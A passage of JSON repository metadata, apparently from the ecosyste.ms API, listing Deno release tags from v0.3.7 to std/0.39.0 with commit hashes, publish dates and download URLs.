0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/